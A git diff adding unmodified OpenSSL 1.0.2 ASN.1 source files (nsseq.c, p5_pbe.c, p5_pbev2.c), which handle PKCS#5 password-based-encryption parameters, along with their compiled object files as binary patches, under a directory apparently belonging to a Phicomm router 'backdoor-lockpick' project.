+    if (operation == ASN1_OP_NEW_POST) {
+        NETSCAPE_CERT_SEQUENCE *nsseq;
+        nsseq = (NETSCAPE_CERT_SEQUENCE *)*pval;
+        nsseq->type = OBJ_nid2obj(NID_netscape_cert_sequence);
+    }
+    return 1;
+}
+
+/* Netscape certificate sequence structure */
+
+ASN1_SEQUENCE_cb(NETSCAPE_CERT_SEQUENCE, nsseq_cb) = {
+        ASN1_SIMPLE(NETSCAPE_CERT_SEQUENCE, type, ASN1_OBJECT),
+        ASN1_EXP_SEQUENCE_OF_OPT(NETSCAPE_CERT_SEQUENCE, certs, X509, 0)
+} ASN1_SEQUENCE_END_cb(NETSCAPE_CERT_SEQUENCE, NETSCAPE_CERT_SEQUENCE)
+
+IMPLEMENT_ASN1_FUNCTIONS(NETSCAPE_CERT_SEQUENCE)
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/nsseq.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/nsseq.o
new file mode 100644
index 0000000000000000000000000000000000000000..f473917a5e29bfafd9b9af2ed63e0a06e48e569d
GIT binary patch
literal 3496
zcmcImO>7%g5FUF=8)#|M0HUQRTJ?Z}AS>HY+M-g~F`JlTk`OypB!o6=drMqmJJ@TH
z^w1*p5`>U?DHkpX3B<9--inkXhh9NkdW0h?r>atzc{>xozP!DF7-{#L`QH4z|J@sY
zbvB#HfJg=|!pIU9VCw0SUQ}ukCg3<cJU01g_x|ui?cM^im9HlMpvKCV&Rxp#(T;*0
z@~V9OEH(W}uf%@Au-`H4Gkf;DU$2!*i+)h{m+C>y|8Uu#FZ&R0ZA8$F`tg7~ts-L?
zH(IlXZMGZD|GRnHs4!;Od*)oZ{I)x_+!%J_p?ltY!^=(Q&kmKDzh20Bxi?=;=p^C*
z0*&n{eCFnt0muC_aSlEt&nEzxYfF&X9M7COa%k)pPTC3NU*@(~2;Vz8elvUd=vZk-
z<vYi1GH--c3%6=;R4+C-HmyMGcL4s{wKY1{ol0Yq(LEXEU?x*&TW7UAYOL(!s97^3
zDF4BI<ODJq7_HhOd*l><5Q=P1F%meMzeXc}SU2}{2afFNy5fL3SvsY32cFr-y^oBn
zncf(t@EznQaAYzs61$E3acv%CKYX8(=MLw23z0<f{G#cqfnUENQr%g$#s6=#Mdv03
zS==b(f7$S#MBe5<ox)#8;h{SiM4x%h1cPP+>~~UtUO^nEwT8n@2<EB_Go@;<FgsiG
z>p{IVQ}qK_n7I^m+pR*caTQvHc3@ARmbV>4sWzVv+HuqgFdW*2R$7XYBRZue>_(q!
z8OgGDD7ey(BF%GT;(+{e9eV^TXL9EWN$8xA$i4J<H<9Utru#|x2(P{g$eH{HDgGa)
z@CD|n?sND^{uzy@?~(9J8vmlkH#GjF#>*bV?eoN`bJ?HxL--Wg&M^|N-zF;>Ph%FL
z`<O)hsZS)XdMEr#tP>Pj7k|0SD;j@_bpn@ls;Sq#VDNGeEE>F=>z2XG`Q0>lIj7(a
zwmNaxK#cndu8G!<)<Z9jHe>KwVH|?j7!1Jc_sAgkyq8CloD_o^HhSy5X1Kne2d~-d
zbfPXM>-OTv!;j(gAP$?Kvi(VS=xy|S8~8V|#nI6k?(VP?ao7J7xEL*Kp(iS`aYZLl
zCtqD?t!VESbrSUr-aNlDe+-dg<x3>{hSrUE^UL@nayBvRzm86n^WVnjF_v=5IYd>7
z)ITi*qtqAlktf}(|A7717zJEW7>kIu`K!>OL|IjD0GdCVQgi<3Ua{3*<qpbu;56Wh
z!nlHHtN)XwKGinsUqy~e$-RN9k~>`gH6a+8Rxw1;AF^=lqTqKMY4N>@9CcN{8z{j8
zj(5q>MEWn(x2TY-885`PI5L{?-ym<BzcF@{`-Rqz{)Qx8_P@0@`fYQEzGECmj&hjs
j^q*+%J)~fYeyma6HRjPU@n6Xv{{<KNL1h`e%=mu*4ZTX<

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/p5_pbe.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/p5_pbe.c
new file mode 100644
index 0000000..bdbfdcd
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/p5_pbe.c
@@ -0,0 +1,143 @@
+/* p5_pbe.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL project
+ * 1999.
+ */
+/* ====================================================================
+ * Copyright (c) 1999 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/asn1t.h>
+#include <openssl/x509.h>
+#include <openssl/rand.h>
+
+/* PKCS#5 password based encryption structure */
+
+ASN1_SEQUENCE(PBEPARAM) = {
+        ASN1_SIMPLE(PBEPARAM, salt, ASN1_OCTET_STRING),
+        ASN1_SIMPLE(PBEPARAM, iter, ASN1_INTEGER)
+} ASN1_SEQUENCE_END(PBEPARAM)
+
+IMPLEMENT_ASN1_FUNCTIONS(PBEPARAM)
+
+/* Set an algorithm identifier for a PKCS#5 PBE algorithm */
+
+int PKCS5_pbe_set0_algor(X509_ALGOR *algor, int alg, int iter,
+                         const unsigned char *salt, int saltlen)
+{
+    PBEPARAM *pbe = NULL;
+    ASN1_STRING *pbe_str = NULL;
+    unsigned char *sstr;
+
+    pbe = PBEPARAM_new();
+    if (!pbe) {
+        ASN1err(ASN1_F_PKCS5_PBE_SET0_ALGOR, ERR_R_MALLOC_FAILURE);
+        goto err;
+    }
+    if (iter <= 0)
+        iter = PKCS5_DEFAULT_ITER;
+    if (!ASN1_INTEGER_set(pbe->iter, iter)) {
+        ASN1err(ASN1_F_PKCS5_PBE_SET0_ALGOR, ERR_R_MALLOC_FAILURE);
+        goto err;
+    }
+    if (!saltlen)
+        saltlen = PKCS5_SALT_LEN;
+    if (!ASN1_STRING_set(pbe->salt, NULL, saltlen)) {
+        ASN1err(ASN1_F_PKCS5_PBE_SET0_ALGOR, ERR_R_MALLOC_FAILURE);
+        goto err;
+    }
+    sstr = ASN1_STRING_data(pbe->salt);
+    if (salt)
+        memcpy(sstr, salt, saltlen);
+    else if (RAND_pseudo_bytes(sstr, saltlen) < 0)
+        goto err;
+
+    if (!ASN1_item_pack(pbe, ASN1_ITEM_rptr(PBEPARAM), &pbe_str)) {
+        ASN1err(ASN1_F_PKCS5_PBE_SET0_ALGOR, ERR_R_MALLOC_FAILURE);
+        goto err;
+    }
+
+    PBEPARAM_free(pbe);
+    pbe = NULL;
+
+    if (X509_ALGOR_set0(algor, OBJ_nid2obj(alg), V_ASN1_SEQUENCE, pbe_str))
+        return 1;
+
+ err:
+    if (pbe != NULL)
+        PBEPARAM_free(pbe);
+    if (pbe_str != NULL)
+        ASN1_STRING_free(pbe_str);
+    return 0;
+}
+
+/* Return an algorithm identifier for a PKCS#5 PBE algorithm */
+
+X509_ALGOR *PKCS5_pbe_set(int alg, int iter,
+                          const unsigned char *salt, int saltlen)
+{
+    X509_ALGOR *ret;
+    ret = X509_ALGOR_new();
+    if (!ret) {
+        ASN1err(ASN1_F_PKCS5_PBE_SET, ERR_R_MALLOC_FAILURE);
+        return NULL;
+    }
+
+    if (PKCS5_pbe_set0_algor(ret, alg, iter, salt, saltlen))
+        return ret;
+
+    X509_ALGOR_free(ret);
+    return NULL;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/p5_pbe.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/p5_pbe.o
new file mode 100644
index 0000000000000000000000000000000000000000..599e04568aefe89f38c4aa2eb0e894ef55e47f6a
GIT binary patch
literal 4728
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
bAuby4yBg+F;Xg@v|0E^@de33gPq+Wy_pi5Y

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/p5_pbev2.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/p5_pbev2.c
new file mode 100644
index 0000000..73ba4a3
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/p5_pbev2.c
@@ -0,0 +1,280 @@
+/* p5_pbev2.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL project
+ * 1999-2004.
+ */
+/* ====================================================================
+ * Copyright (c) 1999 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/asn1t.h>
+#include <openssl/x509.h>
+#include <openssl/rand.h>
+
+/* PKCS#5 v2.0 password based encryption structures */
+
+ASN1_SEQUENCE(PBE2PARAM) = {
+        ASN1_SIMPLE(PBE2PARAM, keyfunc, X509_ALGOR),
+        ASN1_SIMPLE(PBE2PARAM, encryption, X509_ALGOR)
+} ASN1_SEQUENCE_END(PBE2PARAM)
+
+IMPLEMENT_ASN1_FUNCTIONS(PBE2PARAM)
+
+ASN1_SEQUENCE(PBKDF2PARAM) = {
+        ASN1_SIMPLE(PBKDF2PARAM, salt, ASN1_ANY),
+        ASN1_SIMPLE(PBKDF2PARAM, iter, ASN1_INTEGER),
+        ASN1_OPT(PBKDF2PARAM, keylength, ASN1_INTEGER),
+        ASN1_OPT(PBKDF2PARAM, prf, X509_ALGOR)
+} ASN1_SEQUENCE_END(PBKDF2PARAM)
+
+IMPLEMENT_ASN1_FUNCTIONS(PBKDF2PARAM)
+
+/*
+ * Return an algorithm identifier for a PKCS#5 v2.0 PBE algorithm: yes I know
+ * this is horrible! Extended version to allow application supplied PRF NID
+ * and IV.
+ */
+
+X509_ALGOR *PKCS5_pbe2_set_iv(const EVP_CIPHER *cipher, int iter,
+                              unsigned char *salt, int saltlen,
+                              unsigned char *aiv, int prf_nid)
+{
+    X509_ALGOR *scheme = NULL, *kalg = NULL, *ret = NULL;
+    int alg_nid, keylen;
+    EVP_CIPHER_CTX ctx;
+    unsigned char iv[EVP_MAX_IV_LENGTH];
+    PBE2PARAM *pbe2 = NULL;
+    ASN1_OBJECT *obj;
+
+    alg_nid = EVP_CIPHER_type(cipher);
+    if (alg_nid == NID_undef) {
+        ASN1err(ASN1_F_PKCS5_PBE2_SET_IV,
+                ASN1_R_CIPHER_HAS_NO_OBJECT_IDENTIFIER);
+        goto err;
+    }
+    obj = OBJ_nid2obj(alg_nid);
+
+    if (!(pbe2 = PBE2PARAM_new()))
+        goto merr;
+
+    /* Setup the AlgorithmIdentifier for the encryption scheme */
+    scheme = pbe2->encryption;
+
+    scheme->algorithm = obj;
+    if (!(scheme->parameter = ASN1_TYPE_new()))
+        goto merr;
+
+    /* Create random IV */
+    if (EVP_CIPHER_iv_length(cipher)) {
+        if (aiv)
+            memcpy(iv, aiv, EVP_CIPHER_iv_length(cipher));
+        else if (RAND_pseudo_bytes(iv, EVP_CIPHER_iv_length(cipher)) < 0)
+            goto err;
+    }
+
+    EVP_CIPHER_CTX_init(&ctx);
+
+    /* Dummy cipherinit to just setup the IV, and PRF */
+    if (!EVP_CipherInit_ex(&ctx, cipher, NULL, NULL, iv, 0))
+        goto err;
+    if (EVP_CIPHER_param_to_asn1(&ctx, scheme->parameter) < 0) {
+        ASN1err(ASN1_F_PKCS5_PBE2_SET_IV, ASN1_R_ERROR_SETTING_CIPHER_PARAMS);
+        EVP_CIPHER_CTX_cleanup(&ctx);
+        goto err;
+    }
+    /*
+     * If prf NID unspecified see if cipher has a preference. An error is OK
+     * here: just means use default PRF.
+     */
+    if ((prf_nid == -1) &&
+        EVP_CIPHER_CTX_ctrl(&ctx, EVP_CTRL_PBE_PRF_NID, 0, &prf_nid) <= 0) {
+        ERR_clear_error();
+        prf_nid = NID_hmacWithSHA1;
+    }
+    EVP_CIPHER_CTX_cleanup(&ctx);
+
+    /* If its RC2 then we'd better setup the key length */
+
+    if (alg_nid == NID_rc2_cbc)
+        keylen = EVP_CIPHER_key_length(cipher);
+    else
+        keylen = -1;
+
+    /* Setup keyfunc */
+
+    X509_ALGOR_free(pbe2->keyfunc);
+
+    pbe2->keyfunc = PKCS5_pbkdf2_set(iter, salt, saltlen, prf_nid, keylen);
+
+    if (!pbe2->keyfunc)
+        goto merr;
+
+    /* Now set up top level AlgorithmIdentifier */
+
+    if (!(ret = X509_ALGOR_new()))
+        goto merr;
+    if (!(ret->parameter = ASN1_TYPE_new()))
+        goto merr;
+
+    ret->algorithm = OBJ_nid2obj(NID_pbes2);
+
+    /* Encode PBE2PARAM into parameter */
+
+    if (!ASN1_item_pack(pbe2, ASN1_ITEM_rptr(PBE2PARAM),
+                        &ret->parameter->value.sequence))
+         goto merr;
+    ret->parameter->type = V_ASN1_SEQUENCE;
+
+    PBE2PARAM_free(pbe2);
+    pbe2 = NULL;
+
+    return ret;
+
+ merr:
+    ASN1err(ASN1_F_PKCS5_PBE2_SET_IV, ERR_R_MALLOC_FAILURE);
+
+ err:
+    PBE2PARAM_free(pbe2);
+    /* Note 'scheme' is freed as part of pbe2 */
+    X509_ALGOR_free(kalg);
+    X509_ALGOR_free(ret);
+
+    return NULL;
+
+}
+
+X509_ALGOR *PKCS5_pbe2_set(const EVP_CIPHER *cipher, int iter,
+                           unsigned char *salt, int saltlen)
+{
+    return PKCS5_pbe2_set_iv(cipher, iter, salt, saltlen, NULL, -1);
+}
+
+X509_ALGOR *PKCS5_pbkdf2_set(int iter, unsigned char *salt, int saltlen,
+                             int prf_nid, int keylen)
+{
+    X509_ALGOR *keyfunc = NULL;
+    PBKDF2PARAM *kdf = NULL;
+    ASN1_OCTET_STRING *osalt = NULL;
+
+    if (!(kdf = PBKDF2PARAM_new()))
+        goto merr;
+    if (!(osalt = M_ASN1_OCTET_STRING_new()))
+        goto merr;
+
+    kdf->salt->value.octet_string = osalt;
+    kdf->salt->type = V_ASN1_OCTET_STRING;
+
+    if (!saltlen)
+        saltlen = PKCS5_SALT_LEN;
+    if (!(osalt->data = OPENSSL_malloc(saltlen)))
+        goto merr;
+
+    osalt->length = saltlen;
+
+    if (salt)
+        memcpy(osalt->data, salt, saltlen);
+    else if (RAND_pseudo_bytes(osalt->data, saltlen) < 0)
+        goto merr;
+
+    if (iter <= 0)
+        iter = PKCS5_DEFAULT_ITER;
+
+    if (!ASN1_INTEGER_set(kdf->iter, iter))
+        goto merr;
+
+    /* If have a key len set it up */
+
+    if (keylen > 0) {
+        if (!(kdf->keylength = M_ASN1_INTEGER_new()))
+            goto merr;
+        if (!ASN1_INTEGER_set(kdf->keylength, keylen))
+            goto merr;
+    }
+
+    /* prf can stay NULL if we are using hmacWithSHA1 */
+    if (prf_nid > 0 && prf_nid != NID_hmacWithSHA1) {
+        kdf->prf = X509_ALGOR_new();
+        if (!kdf->prf)
+            goto merr;
+        X509_ALGOR_set0(kdf->prf, OBJ_nid2obj(prf_nid), V_ASN1_NULL, NULL);
+    }
+
+    /* Finally setup the keyfunc structure */
+
+    keyfunc = X509_ALGOR_new();
+    if (!keyfunc)
+        goto merr;
+
+    keyfunc->algorithm = OBJ_nid2obj(NID_id_pbkdf2);
+
+    /* Encode PBKDF2PARAM into parameter of pbe2 */
+
+    if (!(keyfunc->parameter = ASN1_TYPE_new()))
+        goto merr;
+
+    if (!ASN1_item_pack(kdf, ASN1_ITEM_rptr(PBKDF2PARAM),
+                        &keyfunc->parameter->value.sequence))
+         goto merr;
+    keyfunc->parameter->type = V_ASN1_SEQUENCE;
+
+    PBKDF2PARAM_free(kdf);
+    return keyfunc;
+
+ merr:
+    ASN1err(ASN1_F_PKCS5_PBKDF2_SET, ERR_R_MALLOC_FAILURE);
+    PBKDF2PARAM_free(kdf);
+    X509_ALGOR_free(keyfunc);
+    return NULL;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/p5_pbev2.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/p5_pbev2.o
new file mode 100644
index 0000000000000000000000000000000000000000..4194e070115a0a5ccdfcf54a9f668e31c27e469c
GIT binary patch
literal 7904
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
